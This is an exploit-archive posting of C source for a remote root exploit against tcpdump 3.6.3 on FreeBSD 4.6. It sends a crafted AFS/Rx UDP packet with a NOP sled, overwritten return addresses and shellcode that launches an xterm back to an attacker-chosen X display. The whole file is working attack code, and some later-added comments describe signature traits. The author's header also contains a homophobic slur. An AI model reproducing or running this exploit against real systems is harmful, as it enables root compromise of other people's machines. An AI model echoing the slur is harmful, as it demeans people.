
tcpdumpFBSD363.c

tcpdumpFBSD363.c
Posted Dec 24, 2002
Authored by Icesk

Tcpdump v3.6.3 remote root exploit. Tested against FreeBSD-4.6.

tags | exploit, remote, root
systems | freebsd
SHA-256 | c738ae09342cca2f263e6827dfaa5d34cca5a8098a2efa6c3adaa524156ad552

tcpdumpFBSD363.c

   /* TCPDUMP 3.6.3 remote root exploit 
*
* tested against FreeBSD-4.6
*
* By: icesk
*
* Greets: meenor, optik, scsiu, stanly
* flames: ezoons (homo)
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

/* Exploit tunables for one specific target build: a hard-coded stack
 * address (shifted by OFFSET, or argv[3] when given), how many copies of
 * it are written into the datagram, and the NOP byte / sled length.
 * None of these are checked against the target; a wrong ADDR simply
 * crashes the remote process instead of running the payload. */
#define ADDR 0xbffff248
#define OFFSET 0
#define NUM_ADDR 10
#define NOP 0x90
#define NUM_NOP 100

/* Protocol constants placed in the packet: the header type and flag
 * values, the UDP destination port and the locally bound source port,
 * and the 32-bit call number written right after the header. */
#define RX_CLIENT_INITIATED 1
#define RX_PACKET_TYPE_DATA 1
#define FS_RX_DPORT 7000
#define FS_RX_SPORT 7001
#define AFS_CALL 134

/*
 * Packet header as the target's parser is expected to read it from the
 * wire (the names suggest the Rx transport used by AFS; not verifiable
 * from this file).  The layout must stay exactly as written: main()
 * overlays this struct on the start of the send buffer and writes the
 * 32-bit call words immediately after sizeof(struct rx_header).  Only
 * type, seq and flags are ever set; the remaining fields go out as the
 * zero bytes left by the buffer memset.  The u_* names are BSD
 * <sys/types.h> aliases, not C99 fixed-width types.
 */
struct rx_header {
u_int32_t epoch;
u_int32_t cid;
u_int32_t callNumber;
u_int32_t seq;
u_int32_t serial;
u_char type;
u_char flags;
u_char userStatus;
u_char securityIndex;
u_short spare;
u_short serviceId;
};

/*
 * Payload bytes for the original i386 FreeBSD target, kept here as an
 * opaque blob.  Two things are visible without disassembling it:
 *  - main() overwrites shellcode[30] at runtime with a length derived
 *    from argv[2] (the display string), so that byte is a placeholder
 *    rather than fixed code;
 *  - the tail is a cleartext argument list ("/bin/sh", "-c", the xterm
 *    path, "-ut", "-display") with 'Z' separating the fields.  Those
 *    literal strings, together with the fixed port pair and the long run
 *    of 0x90 bytes in front of them, are what a signature for this
 *    sample would key on.
 */
char shellcode[] =
"\xeb\x57\x5e\xb3\x21\xfe\xcb\x88\x5e\x2c\x88\x5e\x23"
"\x88\x5e\x1f\x31\xdb\x88\x5e\x07\x46\x46\x88\x5e\x08"
"\x4e\x4e\x88\x5e\xFF\x89\x5e\xfc\x89\x76\xf0\x8d\x5e"
"\x08\x89\x5e\xf4\x83\xc3\x03\x89\x5e\xf8\x8d\x4e\xf0"
"\x89\xf3\x8d\x56\xfc\x31\xc0\xb0\x0e\x48\x48\x48\xcd"
"\x80\x31\xc0\x40\x31\xdb\xcd\x80\xAA\xAA\xAA\xAA\xBB"
"\xBB\xBB\xBB\xCC\xCC\xCC\xCC\xDD\xDD\xDD\xDD\xe8\xa4"
"\xff\xff\xff"
"/bin/shZ-cZ/usr/X11R6/bin/xtermZ-utZ-displayZ";

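/*
 * Resolve a host name or dotted-quad string to an IPv4 address.
 *
 * Returns the address in network byte order, widened to long so the
 * caller can store it straight into sin_addr.s_addr.  On failure the
 * process exits with status -1, as in the original; callers never see
 * an error value.
 *
 * The dotted-quad probe compares against INADDR_NONE instead of -1:
 * inet_addr() returns in_addr_t, so on platforms where long is wider
 * than 32 bits the old "== -1" test could never match and an unparsable
 * string was silently used as 255.255.255.255.  (That address itself is
 * indistinguishable from the error value with inet_addr(); it is sent
 * to gethostbyname() and rejected there.)
 */
long resolve(char *name) {
    in_addr_t ip = inet_addr(name);

    if (ip == INADDR_NONE) {
        struct hostent *hp = gethostbyname(name);

        /* Accept only an IPv4 answer of exactly sizeof ip bytes; anything
         * else would make the fixed-size copy below read the wrong width. */
        if (hp == NULL || hp->h_addrtype != AF_INET
            || hp->h_length != (int)sizeof ip || hp->h_addr_list[0] == NULL) {
            fprintf(stderr, "Can't resolve host name [%s].\n", name);
            exit(-1);
        }
        memcpy(&ip, hp->h_addr_list[0], sizeof ip);
    }
    return (long)ip;
}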


/*
 * Assemble one UDP datagram and send it to the target.  argv[1] is the
 * host, argv[2] the X display string embedded in the payload, optional
 * argv[3] an offset added to ADDR.
 *
 * Review notes (code left exactly as published):
 *  - return_addr is a long, written into the packet through a long int *
 *    and printed with "%#x".  The in-packet layout and the fixed
 *    520-byte send length only line up when long is 32 bits, as on the
 *    original i386 host; the format specifier is wrong for a long.
 *  - addr and sin are never zeroed, and &addr is passed to sendto()
 *    without the (struct sockaddr *) cast that bind() uses.
 *  - argv[2] is copied into the 4048-byte stack buffer without any
 *    length check.
 */
int main (int argc, char *argv[]) {

struct sockaddr_in addr,sin;
int sock,aux, offset=OFFSET;
char buffer[4048], *chptr;
struct rx_header *rxh;
long int *lptr, return_addr=ADDR;


fprintf(stderr,"Tcpdump 3.6.3 remote exploit against FreeBSD 4.6\n\n");


if (argc<3) {
printf("Usage: %s [host] [display] [offset]\n",argv[0]);
exit(-1);
}

/* atoi() reports no error: a non-numeric offset silently becomes 0. */
if (argc==4) offset=atoi(argv[3]);
return_addr+=offset;

fprintf(stderr,"Using return addr: %#x\n",return_addr);

/* Destination: UDP port FS_RX_DPORT on the resolved host. */
addr.sin_family=AF_INET;
addr.sin_addr.s_addr=resolve(argv[1]);
addr.sin_port=htons(FS_RX_DPORT);

if ((sock=socket(AF_INET, SOCK_DGRAM,0))<0) {
perror("socket()");
exit(-1);
}

/* The source port is pinned to FS_RX_SPORT, so bind() fails if that
 * port is already in use locally.  The fixed port pair is a stable
 * attribute of this traffic. */
sin.sin_family=AF_INET;
sin.sin_addr.s_addr=INADDR_ANY;
sin.sin_port=htons(FS_RX_SPORT);

if (bind(sock,(struct sockaddr*)&sin,sizeof(sin))<0) {
perror("bind()");
exit(-1);
}

/* Zero the whole buffer first: every header field not set below, and
 * any slack before the 520-byte mark, is sent as zero bytes. */
memset(buffer,0,sizeof(buffer));
rxh=(struct rx_header *)buffer;

rxh->type=RX_PACKET_TYPE_DATA;
rxh->seq=htonl(1);
rxh->flags=RX_CLIENT_INITIATED;

/* Four big-endian 32-bit words follow the header: the call number and
 * three constant words. */
lptr=(long int *)(buffer+sizeof(struct rx_header));
*(lptr++)=htonl(AFS_CALL);
*(lptr++)=htonl(1);
*(lptr++)=htonl(2);
*(lptr++)=htonl(3);

/* A length word, then a short text field.  sprintf() writes five bytes
 * including the NUL, but only four are kept; the NUL is overwritten by
 * the filler below. */
*(lptr++)=htonl(420);
chptr=(char *)lptr;
sprintf(chptr,"1 0\n");
chptr+=4;

/* Filler, NUM_ADDR copies of the chosen address, then the NOP sled. */
memset(chptr,'A',120);
chptr+=120;
lptr=(long int *)chptr;
for (aux=0;aux<NUM_ADDR;aux++) *(lptr++)=return_addr;
chptr=(char *)lptr;
memset(chptr,NOP,NUM_NOP);
chptr+=NUM_NOP;
/* One payload byte is patched with a length derived from argv[2].  The
 * constant 46 is presumably the fixed part of the argument block the
 * payload builds at runtime -- not verifiable from this file. */
shellcode[30]=(char)(46+strlen(argv[2]));
memcpy(chptr,shellcode,strlen(shellcode));
chptr+=strlen(shellcode);
memcpy(chptr,argv[2],strlen(argv[2]));
chptr+=strlen(argv[2]);

sprintf(chptr," 1\n");

/* Always sends exactly 520 bytes; chptr is not used to size the
 * datagram, so the trailer is whatever the memset left there. */
if (sendto(sock,buffer,520,0,&addr,sizeof(addr))==-1) {
perror("send()");
exit(-1);
}

fprintf(stderr,"Packet Sent Waiting For Xterm!!!\n\n");

close(sock);
return(0);
}
